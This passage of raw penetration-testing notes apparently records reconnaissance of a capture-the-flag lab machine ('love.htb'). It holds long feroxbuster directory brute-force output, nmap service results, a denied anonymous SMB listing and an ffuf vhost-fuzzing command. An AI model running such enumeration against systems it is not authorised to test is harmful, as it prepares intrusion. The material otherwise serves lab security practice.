200 GET 1198l 5575w 47378c http://10.10.10.239/bower_components/fullcalendar/CHANGELOG.md
200 GET 13l 82w 552c http://10.10.10.239/bower_components/bootstrap-colorpicker/LICENSE
200 GET 935l 2880w 26566c http://10.10.10.239/bower_components/PACE/pace.js
200 GET 137l 794w 5546c http://10.10.10.239/bower_components/ckeditor/styles.js
200 GET 10l 37w 396c http://10.10.10.239/bower_components/ckeditor/bower.json
200 GET 26l 48w 564c http://10.10.10.239/bower_components/ckeditor/package.json
200 GET 38l 178w 1321c http://10.10.10.239/bower_components/ckeditor/config.js
200 GET 39l 65w 1030c http://10.10.10.239/bower_components/bootstrap-datepicker/composer.json
200 GET 261l 583w 8632c http://10.10.10.239/bower_components/bootstrap-datepicker/Gruntfile.js
200 GET 491l 2964w 19697c http://10.10.10.239/bower_components/bootstrap-datepicker/CHANGELOG.md
200 GET 20l 28w 324c http://10.10.10.239/bower_components/bootstrap-daterangepicker/bower.json
200 GET 32l 72w 894c http://10.10.10.239/bower_components/bootstrap-daterangepicker/package.json
200 GET 74l 446w 3261c http://10.10.10.239/bower_components/bootstrap-datepicker/CODE_OF_CONDUCT.md
200 GET 18l 33w 573c http://10.10.10.239/bower_components/bootstrap-daterangepicker/package.js
200 GET 370l 619w 8383c http://10.10.10.239/bower_components/select2/Gruntfile.js
200 GET 202l 1581w 11358c http://10.10.10.239/bower_components/bootstrap-datepicker/LICENSE
200 GET 41l 403w 2561c http://10.10.10.239/bower_components/bootstrap-datepicker/CONTRIBUTING.md
200 GET 611l 1142w 14854c http://10.10.10.239/bower_components/bootstrap-daterangepicker/daterangepicker.scss
200 GET 48l 88w 1246c http://10.10.10.239/bower_components/bootstrap-datepicker/package.json
200 GET 64l 116w 1081c http://10.10.10.239/bower_components/raphael/webpack.config.js
200 GET 36l 66w 887c http://10.10.10.239/bower_components/Ionicons/composer.json
200 GET 16l 97w 720c http://10.10.10.239/bower_components/jvectormap/LICENSE-COMMERCIAL
200 GET 1498l 8678w 53572c http://10.10.10.239/bower_components/Flot/API.md
200 GET 135l 229w 6635c http://10.10.10.239/bower_components/jvectormap/jquery-jvectormap.css
200 GET 31l 59w 691c http://10.10.10.239/bower_components/Ionicons/bower.json
200 GET 21l 171w 1094c http://10.10.10.239/bower_components/Ionicons/LICENSE
200 GET 4463l 14467w 128945c http://10.10.10.239/bower_components/moment/moment.js
200 GET 140l 145w 309656c http://10.10.10.239/dist/css/adminlte.css.map
200 GET 415l 1296w 15611c http://10.10.10.239/bower_components/jquery-sparkline/src/base.js
200 GET 147l 432w 4339c http://10.10.10.239/bower_components/jquery-sparkline/src/vcanvas-base.js
200 GET 55l 193w 2029c http://10.10.10.239/bower_components/jquery-sparkline/src/simpledraw.js
200 GET 247l 612w 8353c http://10.10.10.239/bower_components/jquery-sparkline/src/interact.js
200 GET 5812l 15089w 123175c http://10.10.10.239/bower_components/mocha/mocha.js
200 GET 224l 731w 7056c http://10.10.10.239/bower_components/jquery-sparkline/src/utils.js
200 GET 256l 1012w 10845c http://10.10.10.239/bower_components/jquery-sparkline/src/chart-bar.js
200 GET 66l 243w 2837c http://10.10.10.239/bower_components/jquery-sparkline/src/chart-discrete.js
200 GET 165l 893w 7811c http://10.10.10.239/bower_components/jquery-sparkline/src/vcanvas-vml.js
200 GET 350l 1216w 15393c http://10.10.10.239/bower_components/jquery-sparkline/src/chart-line.js
200 GET 13l 1743w 240427c http://10.10.10.239/bower_components/jquery-ui/jquery-ui.min.js
200 GET 8l 60w 661c http://10.10.10.239/bower_components/mocha/media/logo.svg
200 GET 8l 167w 1058c http://10.10.10.239/bower_components/PACE/LICENSE
200 GET 1963l 2869w 66151c http://10.10.10.239/bower_components/bootstrap-datepicker/yarn.lock
200 GET 766l 3340w 35103c http://10.10.10.239/bower_components/moment/CHANGELOG.md
200 GET 3l 1189w 93251c http://10.10.10.239/bower_components/raphael/raphael.min.js
200 GET 1420l 11667w 76251c http://10.10.10.239/bower_components/ckeditor/LICENSE.md
200 GET 12l 20w 234c http://10.10.10.239/bower_components/bootstrap-datepicker/bower.json
200 GET 20l 51w 578c http://10.10.10.239/bower_components/ckeditor/composer.json
200 GET 21l 170w 1083c http://10.10.10.239/bower_components/raphael/license.txt
200 GET 31l 48w 516c http://10.10.10.239/bower_components/raphael/bower.json
200 GET 269l 778w 8163c http://10.10.10.239/bower_components/bootstrap-daterangepicker/daterangepicker.css
200 GET 19l 35w 429c http://10.10.10.239/bower_components/Ionicons/component.json
200 GET 1428l 4871w 41943c http://10.10.10.239/bower_components/Flot/excanvas.js
200 GET 1358l 14792w 172179c http://10.10.10.239/bower_components/ckeditor/CHANGES.md
200 GET 345l 1335w 9599c http://10.10.10.239/bower_components/Flot/jquery.flot.canvas.js
200 GET 1082l 7313w 563686c http://10.10.10.239/bower_components/ckeditor/ckeditor.js
200 GET 2l 210w 12507c http://10.10.10.239/bower_components/PACE/pace.min.js
301 GET 9l 30w 360c http://10.10.10.239/bower_components/jquery-knob => http://10.10.10.239/bower_components/jquery-knob/
200 GET 7927l 32618w 299364c http://10.10.10.239/bower_components/raphael/raphael.no-deps.js
301 GET 9l 30w 366c http://10.10.10.239/bower_components/fullcalendar/dist => http://10.10.10.239/bower_components/fullcalendar/dist/
301 GET 9l 30w 372c http://10.10.10.239/bower_components/bootstrap-timepicker/js => http://10.10.10.239/bower_components/bootstrap-timepicker/js/
503 GET 11l 44w 402c http://10.10.10.239/examples
200 GET 2012l 2913w 67903c http://10.10.10.239/bower_components/raphael/yarn.lock
200 GET 208l 373w 2955c http://10.10.10.239/bower_components/ckeditor/contents.css
301 GET 9l 30w 359c http://10.10.10.239/bower_components/moment/src => http://10.10.10.239/bower_components/moment/src/
301 GET 9l 30w 362c http://10.10.10.239/bower_components/Flot/examples => http://10.10.10.239/bower_components/Flot/examples/
301 GET 9l 30w 365c http://10.10.10.239/bower_components/ckeditor/plugins => http://10.10.10.239/bower_components/ckeditor/plugins/
301 GET 9l 30w 375c http://10.10.10.239/bower_components/ckeditor/plugins/templates => http://10.10.10.239/bower_components/ckeditor/plugins/templates/
200 GET 755l 2268w 18527c http://10.10.10.239/bower_components/PACE/pace.coffee
200 GET 8160l 32872w 215256c http://10.10.10.239/bower_components/jquery/dist/jquery.slim.js
200 GET 755l 4545w 389831c http://10.10.10.239/bower_components/bootstrap-daterangepicker/drp.png
200 GET 4023l 24508w 2157014c http://10.10.10.239/dist/img/photo4.jpg
200 GET 1626l 5242w 69588c http://10.10.10.239/bower_components/bootstrap-daterangepicker/daterangepicker.js
301 GET 9l 30w 368c http://10.10.10.239/bower_components/ckeditor/samples/js => http://10.10.10.239/bower_components/ckeditor/samples/js/
301 GET 9l 30w 369c http://10.10.10.239/bower_components/ckeditor/samples/css => http://10.10.10.239/bower_components/ckeditor/samples/css/
301 GET 9l 30w 374c http://10.10.10.239/bower_components/ckeditor/plugins/language => http://10.10.10.239/bower_components/ckeditor/plugins/language/
301 GET 9l 30w 365c http://10.10.10.239/bower_components/ckeditor/samples => http://10.10.10.239/bower_components/ckeditor/samples/
200 GET 3168l 12352w 122971c http://10.10.10.239/bower_components/Flot/jquery.flot.js
200 GET 8353l 34429w 314913c http://10.10.10.239/bower_components/raphael/raphael.js
200 GET 3l 1127w 90152c http://10.10.10.239/bower_components/raphael/raphael.no-deps.min.js
200 GET 28009l 80981w 1276366c http://10.10.10.239/bower_components/Ionicons/cheatsheet.html
200 GET 2547l 15691w 1213097c http://10.10.10.239/dist/img/photo1.png
301 GET 9l 30w 363c http://10.10.10.239/bower_components/moment/src/lib => http://10.10.10.239/bower_components/moment/src/lib/
200 GET 18l 62w 1199c http://10.10.10.239/bower_components/Ionicons/src/android-bus.svg
200 GET 18l 62w 1334c http://10.10.10.239/bower_components/Ionicons/src/eye-disabled.svg
200 GET 11l 54w 776c http://10.10.10.239/bower_components/Ionicons/src/ios-home-outline.svg
200 GET 9l 49w 825c http://10.10.10.239/bower_components/Ionicons/src/chatbubble.svg
301 GET 9l 30w 382c http://10.10.10.239/bower_components/bootstrap-daterangepicker/website => http://10.10.10.239/bower_components/bootstrap-daterangepicker/website/
301 GET 9l 30w 369c http://10.10.10.239/bower_components/ckeditor/plugins/xml => http://10.10.10.239/bower_components/ckeditor/plugins/xml/
301 GET 9l 30w 371c http://10.10.10.239/bower_components/ckeditor/plugins/about => http://10.10.10.239/bower_components/ckeditor/plugins/about/
301 GET 9l 30w 361c http://10.10.10.239/bower_components/Ionicons/png => http://10.10.10.239/bower_components/Ionicons/png/
301 GET 9l 30w 368c http://10.10.10.239/bower_components/Flot/examples/image => http://10.10.10.239/bower_components/Flot/examples/image/
301 GET 9l 30w 365c http://10.10.10.239/bower_components/raphael/dev/test => http://10.10.10.239/bower_components/raphael/dev/test/
200 GET 7l 57w 611c http://10.10.10.239/bower_components/Ionicons/src/star.svg
200 GET 12l 56w 701c http://10.10.10.239/bower_components/Ionicons/src/android-contract.svg
200 GET 7l 53w 556c http://10.10.10.239/bower_components/Ionicons/src/android-send.svg
200 GET 9l 50w 811c http://10.10.10.239/bower_components/Ionicons/src/android-notifications.svg
200 GET 8l 48w 693c http://10.10.10.239/bower_components/Ionicons/src/battery-full.svg
200 GET 33l 106w 1908c http://10.10.10.239/bower_components/Ionicons/src/ios-partlysunny-outline.svg
200 GET 7l 47w 568c http://10.10.10.239/bower_components/Ionicons/src/ios-fastforward.svg
301 GET 9l 30w 363c http://10.10.10.239/bower_components/jvectormap/src => http://10.10.10.239/bower_components/jvectormap/src/
301 GET 9l 30w 365c http://10.10.10.239/bower_components/moment/templates => http://10.10.10.239/bower_components/moment/templates/
200 GET 10l 50w 898c http://10.10.10.239/bower_components/Ionicons/src/checkmark.svg
200 GET 7l 47w 568c http://10.10.10.239/bower_components/Ionicons/src/ios-rewind.svg
200 GET 14l 56w 1083c http://10.10.10.239/bower_components/Ionicons/src/ios-cart.svg
200 GET 23l 67w 2130c http://10.10.10.239/bower_components/Ionicons/src/happy-outline.svg
200 GET 26l 70w 1666c http://10.10.10.239/bower_components/Ionicons/src/android-contacts.svg
200 GET 29l 76w 2661c http://10.10.10.239/bower_components/Ionicons/src/ios-rose-outline.svg
200 GET 25l 71w 1849c http://10.10.10.239/bower_components/Ionicons/src/radio-waves.svg
200 GET 12l 64w 685c http://10.10.10.239/bower_components/Ionicons/src/ios-browsers-outline.svg
200 GET 12l 53w 1104c http://10.10.10.239/bower_components/Ionicons/src/ios-cloud-outline.svg
200 GET 15l 55w 1329c http://10.10.10.239/bower_components/Ionicons/src/gear-a.svg
200 GET 7l 53w 564c http://10.10.10.239/bower_components/Ionicons/src/ios-volume-low.svg
200 GET 11l 52w 626c http://10.10.10.239/bower_components/Ionicons/src/android-add.svg
301 GET 9l 30w 346c http://10.10.10.239/ADMIN/Includes => http://10.10.10.239/ADMIN/Includes/
200 GET 10l 51w 673c http://10.10.10.239/bower_components/Ionicons/src/ios-home.svg
301 GET 9l 30w 346c http://10.10.10.239/Admin/includes => http://10.10.10.239/Admin/includes/
200 GET 12l 56w 898c http://10.10.10.239/bower_components/Ionicons/src/ios-trash.svg
200 GET 12l 60w 751c http://10.10.10.239/bower_components/Ionicons/src/android-apps.svg
200 GET 11l 52w 740c http://10.10.10.239/bower_components/Ionicons/src/ios-pie.svg
200 GET 11l 52w 990c http://10.10.10.239/bower_components/Ionicons/src/tshirt-outline.svg
200 GET 12l 52w 1159c http://10.10.10.239/bower_components/Ionicons/src/ios-pulse-strong.svg
200 GET 13l 55w 830c http://10.10.10.239/bower_components/Ionicons/src/android-checkbox-outline.svg
301 GET 9l 30w 365c http://10.10.10.239/bower_components/select2/dist/CSS => http://10.10.10.239/bower_components/select2/dist/CSS/
200 GET 10l 50w 636c http://10.10.10.239/bower_components/Ionicons/src/ios-checkmark-empty.svg
200 GET 44l 90w 4251c http://10.10.10.239/bower_components/Ionicons/src/ios-people-outline.svg
200 GET 15l 57w 1250c http://10.10.10.239/bower_components/Ionicons/src/erlenmeyer-flask-bubbles.svg
200 GET 17l 69w 966c http://10.10.10.239/bower_components/Ionicons/src/ios-thunderstorm.svg
200 GET 22l 66w 2008c http://10.10.10.239/bower_components/Ionicons/src/social-foursquare-outline.svg
200 GET 8l 49w 662c http://10.10.10.239/bower_components/Ionicons/src/ios-bolt-outline.svg
200 GET 9l 50w 768c http://10.10.10.239/bower_components/Ionicons/src/android-upload.svg
200 GET 10l 52w 904c http://10.10.10.239/bower_components/Ionicons/src/android-clipboard.svg
200 GET 9l 50w 601c http://10.10.10.239/bower_components/Ionicons/src/social-hackernews.svg
301 GET 9l 30w 346c http://10.10.10.239/ADMIN/includes => http://10.10.10.239/ADMIN/includes/
200 GET 13l 53w 1016c http://10.10.10.239/bower_components/Ionicons/src/ios-stopwatch.svg
200 GET 15l 57w 968c http://10.10.10.239/bower_components/Ionicons/src/skip-backward.svg
200 GET 8l 48w 639c http://10.10.10.239/bower_components/Ionicons/src/ios-grid-view-outline.svg
200 GET 20l 62w 1788c http://10.10.10.239/bower_components/Ionicons/src/social-wordpress.svg
200 GET 21l 64w 1920c http://10.10.10.239/bower_components/Ionicons/src/social-python.svg
200 GET 17l 71w 948c http://10.10.10.239/bower_components/Ionicons/src/ios-information-outline.svg
200 GET 28l 79w 2712c http://10.10.10.239/bower_components/Ionicons/src/beer.svg
200 GET 0l 0w 470596c http://10.10.10.239/bower_components/jquery-ui/jquery-ui.js
200 GET 10l 51w 697c http://10.10.10.239/bower_components/Ionicons/src/arrow-swap.svg
200 GET 10l 55w 642c http://10.10.10.239/bower_components/Ionicons/src/ios-monitor.svg
200 GET 8l 50w 648c http://10.10.10.239/bower_components/Ionicons/src/ios-skipbackward-outline.svg
200 GET 9l 50w 627c http://10.10.10.239/bower_components/Ionicons/src/minus-circled.svg
200 GET 24l 66w 2249c http://10.10.10.239/bower_components/Ionicons/src/ios-analytics-outline.svg
200 GET 18l 67w 1240c http://10.10.10.239/bower_components/Ionicons/src/ios-loop-strong.svg
200 GET 11l 58w 608c http://10.10.10.239/bower_components/Ionicons/src/android-navigate.svg
200 GET 17l 61w 1313c http://10.10.10.239/bower_components/Ionicons/src/social-javascript.svg
200 GET 18l 71w 923c http://10.10.10.239/bower_components/Ionicons/src/ios-plus-outline.svg
301 GET 9l 30w 363c http://10.10.10.239/bower_components/jquery-knob/JS => http://10.10.10.239/bower_components/jquery-knob/JS/
200 GET 11l 55w 676c http://10.10.10.239/bower_components/Ionicons/src/ios-pricetag.svg
200 GET 14l 64w 1130c http://10.10.10.239/bower_components/Ionicons/src/log-in.svg
200 GET 11l 52w 782c http://10.10.10.239/bower_components/Ionicons/src/share.svg
200 GET 16l 60w 1366c http://10.10.10.239/bower_components/Ionicons/src/pull-request.svg
200 GET 10l 51w 728c http://10.10.10.239/bower_components/Ionicons/src/ios-checkmark.svg
200 GET 12l 53w 871c http://10.10.10.239/bower_components/Ionicons/src/eject.svg
301 GET 9l 30w 370c http://10.10.10.239/bower_components/select2/tests/results => http://10.10.10.239/bower_components/select2/tests/results/
301 GET 9l 30w 370c http://10.10.10.239/bower_components/jquery-ui/themes/base => http://10.10.10.239/bower_components/jquery-ui/themes/base/
301 GET 9l 30w 354c http://10.10.10.239/plugins/iCheck/minimal => http://10.10.10.239/plugins/iCheck/minimal/
301 GET 9l 30w 377c http://10.10.10.239/bower_components/bootstrap-datepicker/dist/JS => http://10.10.10.239/bower_components/bootstrap-datepicker/dist/JS/
301 GET 9l 30w 367c http://10.10.10.239/bower_components/select2/tests/DATA => http://10.10.10.239/bower_components/select2/tests/DATA/
[>-------------------] - 16s 51663/1261609 6m found:420 errors:41831
[#>------------------] - 16s 1846/30000 117/s http://10.10.10.239/
[####################] - 7s 30000/30000 4044/s http://10.10.10.239/images/ => Directory listing
[####################] - 8s 30000/30000 3815/s http://10.10.10.239/includes/ => Directory listing
[>-------------------] - 16s 883/30000 56/s http://10.10.10.239/admin/
[####################] - 1s 30000/30000 28143/s http://10.10.10.239/plugins/ => Directory listing
[####################] - 1s 30000/30000 21708/s http://10.10.10.239/bower_components/datatables.net-bs/js/ => Directory listing
[####################] - 4s 30000/30000 7671/s http://10.10.10.239/bower_components/jquery/dist/ => Directory listing
[####################] - 1s 30000/30000 29821/s http://10.10.10.239/bower_components/font-awesome/css/ => Directory listing
[####################] - 0s 30000/30000 230769/s http://10.10.10.239/bower_components/fastclick/lib/ => Directory listing
[####################] - 0s 30000/30000 232558/s http://10.10.10.239/dist/ => Directory listing
[####################] - 0s 30000/30000 260870/s http://10.10.10.239/bower_components/fastclick/ => Directory listing
[####################] - 7s 30000/30000 4145/s http://10.10.10.239/bower_components/datatables.net-bs/ => Directory listing
[####################] - 7s 30000/30000 4096/s http://10.10.10.239/bower_components/jquery/ => Directory listing
[####################] - 0s 30000/30000 384615/s http://10.10.10.239/bower_components/datatables.net/ => Directory listing
[####################] - 0s 30000/30000 100000/s http://10.10.10.239/dist/js/ => Directory listing
[#>------------------] - 15s 2279/30000 148/s http://10.10.10.239/Admin/
[####################] - 2s 30000/30000 13061/s http://10.10.10.239/dist/css/ => Directory listing
[####################] - 5s 30000/30000 6598/s http://10.10.10.239/dist/img/ => Directory listing
[####################] - 0s 30000/30000 117647/s http://10.10.10.239/bower_components/datatables.net/js/ => Directory listing
[####################] - 7s 30000/30000 4258/s http://10.10.10.239/dist/js/pages/ => Directory listing
[>-------------------] - 15s 713/30000 47/s http://10.10.10.239/Admin/includes/
[####################] - 0s 30000/30000 252101/s http://10.10.10.239/bower_components/datatables.net-bs/css/ => Directory listing
[####################] - 7s 30000/30000 4131/s http://10.10.10.239/bower_components/bootstrap/ => Directory listing
[####################] - 0s 30000/30000 265487/s http://10.10.10.239/bower_components/font-awesome/ => Directory listing
[####################] - 7s 30000/30000 4199/s http://10.10.10.239/plugins/iCheck/ => Directory listing
[####################] - 7s 30000/30000 4241/s http://10.10.10.239/bower_components/font-awesome/less/ => Directory listing
[>-------------------] - 16s 51895/1261609 6m found:420 errors:42032
[#>------------------] - 16s 1852/30000 116/s http://10.10.10.239/
[####################] - 7s 30000/30000 4044/s http://10.10.10.239/images/ => Directory listing
[####################] - 8s 30000/30000 3815/s http://10.10.10.239/includes/ => Directory listing
[>-------------------] - 16s 892/30000 57/s http://10.10.10.239/admin/
[####################] - 1s 30000/30000 28143/s http://10.10.10.239/plugins/ => Directory listing
[####################] - 1s 30000/30000 21708/s http://10.10.10.239/bower_components/datatables.net-bs/js/ => Directory listing
[####################] - 4s 30000/30000 7671/s http://10.10.10.239/bower_components/jquery/dist/ => Directory listing
[####################] - 1s 30000/30000 29821/s http://10.10.10.239/bower_components/font-awesome/css/ => Directory listing
[####################] - 0s 30000/30000 230769/s http://10.10.10.239/bower_components/fastclick/lib/ => Directory listing
[####################] - 0s 30000/30000 232558/s http://10.10.10.239/dist/ => Directory listing
[####################] - 0s 30000/30000 260870/s http://10.10.10.239/bower_components/fastclick/ => Directory listing
[####################] - 7s 30000/30000 4145/s http://10.10.10.239/bower_components/datatables.net-bs/ => Directory listing
[####################] - 7s 30000/30000 4096/s http://10.10.10.239/bower_components/jquery/ => Directory listing
[####################] - 0s 30000/30000 384615/s http://10.10.10.239/bower_components/datatables.net/ => Directory listing
[####################] - 0s 30000/30000 100000/s http://10.10.10.239/dist/js/ => Directory listing
[#>------------------] - 15s 2284/30000 148/s http://10.10.10.239/Admin/
[####################] - 2s 30000/30000 13061/s http://10.10.10.239/dist/css/ => Directory listing
[####################] - 5s 30000/30000 6598/s http://10.10.10.239/dist/img/ => Directory listing
[####################] - 0s 30000/30000 117647/s http://10.10.10.239/bower_components/datatables.net/js/ => Directory listing
[####################] - 7s 30000/30000 4258/s http://10.10.10.239/dist/js/pages/ => Directory listing
[>-------------------] - 15s 718/30000 47/s http://10.10.10.239/Admin/includes/
[####################] - 0s 30000/30000 252101/s http://10.10.10.239/bower_components/datatables.net-bs/css/ => Directory listing
[####################] - 7s 30000/30000 4131/s http://10.10.10.239/bower_components/bootstrap/ => Directory listing
[####################] - 0s 30000/30000 265487/s http://10.10.10.239/bower_components/font-awesome/ => Directory listing
[####################] - 7s 30000/30000 4199/s http://10.10.10.239/plugins/iCheck/ => Directory listing
[####################] - 7s 30000/30000 4241/s http://10.10.10.239/bower_components/font-awesome/less/ => Directory listing
[>-------------------] - 16s 52089/1261609 6m found:420 errors:42188
[#>------------------] - 16s 1853/30000 116/s http://10.10.10.239/
[####################] - 7s 30000/30000 4044/s http://10.10.10.239/images/ => Directory listing
[####################] - 8s 30000/30000 3815/s http://10.10.10.239/includes/ => Directory listing
[>-------------------] - 16s 896/30000 57/s http://10.10.10.239/admin/
[####################] - 1s 30000/30000 28143/s http://10.10.10.239/plugins/ => Directory listing
[####################] - 1s 30000/30000 21708/s http://10.10.10.239/bower_components/datatables.net-bs/js/ => Directory listing
[####################] - 4s 30000/30000 7671/s http://10.10.10.239/bower_components/jquery/dist/ => Directory listing
[####################] - 1s 30000/30000 29821/s http://10.10.10.239/bower_components/font-awesome/css/ => Directory listing
[####################] - 0s 30000/30000 230769/s http://10.10.10.239/bower_components/fastclick/lib/ => Directory listing
[####################] - 0s 30000/30000 232558/s http://10.10.10.239/dist/ => Directory listing
[####################] - 0s 30000/30000 260870/s http://10.10.10.239/bower_components/fastclick/ => Directory listing
[####################] - 7s 30000/30000 4145/s http://10.10.10.239/bower_components/datatables.net-bs/ => Directory listing
[####################] - 7s 30000/30000 4096/s http://10.10.10.239/bower_components/jquery/ => Directory listing
[####################] - 0s 30000/30000 384615/s http://10.10.10.239/bower_components/datatables.net/ => Directory listing
[####################] - 0s 30000/30000 100000/s http://10.10.10.239/dist/js/ => Directory listing
[#>------------------] - 16s 2292/30000 148/s http://10.10.10.239/Admin/
[####################] - 2s 30000/30000 13061/s http://10.10.10.239/dist/css/ => Directory listing
[####################] - 5s 30000/30000 6598/s http://10.10.10.239/dist/img/ => Directory listing
[####################] - 0s 30000/30000 117647/s http://10.10.10.239/bower_components/datatables.net/js/ => Directory listing
[####################] - 7s 30000/30000 4258/s http://10.10.10.239/dist/js/pages/ => Directory listing
[>-------------------] - 15s 719/30000 47/s http://10.10.10.239/Admin/includes/
[####################] - 0s 30000/30000 252101/s http://10.10.10.239/bower_components/datatables.net-bs/css/ => Directory listing
[####################] - 7s 30000/30000 4131/s http://10.10.10.239/bower_components/bootstrap/ => Directory listing
[####################] - 0s 30000/30000 265487/s http://10.10.10.239/bower_components/font-awesome/ => Directory listing
[####################] - 7s 30000/30000 4199/s http://10.10.10.239/plugins/iCheck/ => Directory listing
[####################] - 7s 30000/30000 4241/s http://10.10.10.239/bower_components/font-awesome/less/ => Directory listing
[>-------------------] - 16s 52325/1261609 6m found:420 errors:42401
[#>------------------] - 16s 1856/30000 116/s http://10.10.10.239/
[####################] - 7s 30000/30000 4044/s http://10.10.10.239/images/ => Directory listing
[####################] - 8s 30000/30000 3815/s http://10.10.10.239/includes/ => Directory listing
[>-------------------] - 16s 906/30000 57/s http://10.10.10.239/admin/
[####################] - 1s 30000/30000 28143/s http://10.10.10.239/plugins/ => Directory listing
[####################] - 1s 30000/30000 21708/s http://10.10.10.239/bower_components/datatables.net-bs/js/ => Directory listing
[####################] - 4s 30000/30000 7671/s http://10.10.10.239/bower_components/jquery/dist/ => Directory listing
[####################] - 1s 30000/30000 29821/s http://10.10.10.239/bower_components/font-awesome/css/ => Directory listing
[####################] - 0s 30000/30000 230769/s http://10.10.10.239/bower_components/fastclick/lib/ => Directory listing
[####################] - 0s 30000/30000 232558/s http://10.10.10.239/dist/ => Directory listing
[####################] - 0s 30000/30000 260870/s http://10.10.10.239/bower_components/fastclick/ => Directory listing
[####################] - 7s 30000/30000 4145/s http://10.10.10.239/bower_components/datatables.net-bs/ => Directory listing
[####################] - 7s 30000/30000 4096/s http://10.10.10.239/bower_components/jquery/ => Directory listing
[####################] - 0s 30000/30000 384615/s http://10.10.10.239/bower_components/datatables.net/ => Directory listing
[####################] - 0s 30000/30000 100000/s http://10.10.10.239/dist/js/ => Directory listing
[#>------------------] - 16s 2298/30000 148/s http://10.10.10.239/Admin/
[####################] - 2s 30000/30000 13061/s http://10.10.10.239/dist/css/ => Directory listing
[####################] - 5s 30000/30000 6598/s http://10.10.10.239/dist/img/ => Directory listing
[####################] - 0s 30000/30000 117647/s http://10.10.10.239/bower_components/datatables.net/js/ => Directory listing
[####################] - 7s 30000/30000 4258/s http://10.10.10.239/dist/js/pages/ => Directory listing
[>-------------------] - 15s 725/30000 47/s http://10.10.10.239/Admin/includes/
[####################] - 0s 30000/30000 252101/s http://10.10.10.239/bower_components/datatables.net-bs/css/ => Directory listing
[####################] - 7s 30000/30000 4131/s http://10.10.10.239/bower_components/bootstrap/ => Directory listing
[####################] - 0s 30000/30000 265487/s http://10.10.10.239/bower_components/font-awesome/ => Directory listing
[####################] - 7s 30000/30000 4199/s http://10.10.10.239/plugins/iCheck/ => Directory listing
[####################] - 7s 30000/30000 4241/s http://10.10.10.239/bower_components/font-awesome/less/ => Directory listing
301 GET 9l 30w 366c http://10.10.10.239/bower_components/moment/src/locale => http://10.10.10.239/bower_components/moment/src/locale/
301 GET 9l 30w 367c http://10.10.10.239/bower_components/Flot/examples/Ajax => http://10.10.10.239/bower_components/Flot/examples/Ajax/
301 GET 9l 30w 371c http://10.10.10.239/bower_components/ckeditor/plugins/About => http://10.10.10.239/bower_components/ckeditor/plugins/About/
301 GET 9l 30w 368c http://10.10.10.239/bower_components/select2/tests/Utils => http://10.10.10.239/bower_components/select2/tests/Utils/
301 GET 9l 30w 370c http://10.10.10.239/bower_components/ckeditor/plugins/AJAX => http://10.10.10.239/bower_components/ckeditor/plugins/AJAX/
301 GET 9l 30w 369c http://10.10.10.239/bower_components/ckeditor/plugins/div => http://10.10.10.239/bower_components/ckeditor/plugins/div/
🚨 Caught ctrl+c 🚨 saving scan state to ferox-http_10_10_10_239-1737082166.state ...
[##>-----------------] - 55s 176110/1261615 5m found:426 errors:142466
[###>----------------] - 55s 4697/30000 86/s http://10.10.10.239/
[####################] - 7s 30000/30000 4044/s http://10.10.10.239/images/ => Directory listing
[####################] - 8s 30000/30000 3815/s http://10.10.10.239/includes/ => Directory listing
[##>-----------------] - 54s 3805/30000 70/s http://10.10.10.239/admin/
[####################] - 1s 30000/30000 28143/s http://10.10.10.239/plugins/ => Directory listing
[####################] - 1s 30000/30000 21708/s http://10.10.10.239/bower_components/datatables.net-bs/js/ => Directory listing
[####################] - 4s 30000/30000 7671/s http://10.10.10.239/bower_components/jquery/dist/ => Directory listing
[####################] - 1s 30000/30000 29821/s http://10.10.10.239/bower_components/font-awesome/css/ => Directory listing
[####################] - 0s 30000/30000 230769/s http://10.10.10.239/bower_components/fastclick/lib/ => Directory listing
[####################] - 0s 30000/30000 232558/s http://10.10.10.239/dist/ => Directory listing
[####################] - 0s 30000/30000 260870/s http://10.10.10.239/bower_components/fastclick/ => Directory listing
[####################] - 7s 30000/30000 4145/s http://10.10.10.239/bower_components/datatables.net-bs/ => Directory listing
[####################] - 7s 30000/30000 4096/s http://10.10.10.239/bower_components/jquery/ => Directory listing
[####################] - 0s 30000/30000 384615/s http://10.10.10.239/bower_components/datatables.net/ => Directory listing
[####################] - 0s 30000/30000 100000/s http://10.10.10.239/dist/js/ => Directory listing
[###>----------------] - 54s 5172/30000 95/s http://10.10.10.239/Admin/
[####################] - 2s 30000/30000 13061/s http://10.10.10.239/dist/css/ => Directory listing
[####################] - 5s 30000/30000 6598/s http://10.10.10.239/dist/img/ => Directory listing
[####################] - 0s 30000/30000 117647/s http://10.10.10.239/bower_components/datatables.net/js/ => Directory listing
[####################] - 7s 30000/30000 4258/s http://10.10.10.239/dist/js/pages/ => Directory listing
[##>-----------------] - 54s 3668/30000 68/s http://10.10.10.239/Admin/includes/
[####################] - 0s 30000/30000 252101/s http://10.10.10.239/bower_components/datatables.net-bs/css/ => Directory listing
[####################] - 7s 30000/30000 4131/s http://10.10.10.239/bower_components/bootstrap/ => Directory listing
[####################] - 0s 30000/30000 265487/s http://10.10.10.239/bower_components/font-awesome/ => Directory listing
[####################] - 7s 30000/30000 4199/s http://10.10.10.239/plugins/iCheck/ => Directory listing 443/tcp open ssl/http
sh
443/tcp open ssl/http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after: 2022-01-18T14:00:16
|_ssl-date: TLS randomness does not represent time
445/tcp open
sh
445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)sh
smbclient -N -L \\\\10.10.10.239
session setup failed: NT_STATUS_ACCESS_DENIED5000/tcp open http
sh
5000/tcp open http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
ffuf vhost
sh
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://love.htb/ -H 'Host: FUZZ.love.htb' -fs 4388 -mc all
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://love.htb/
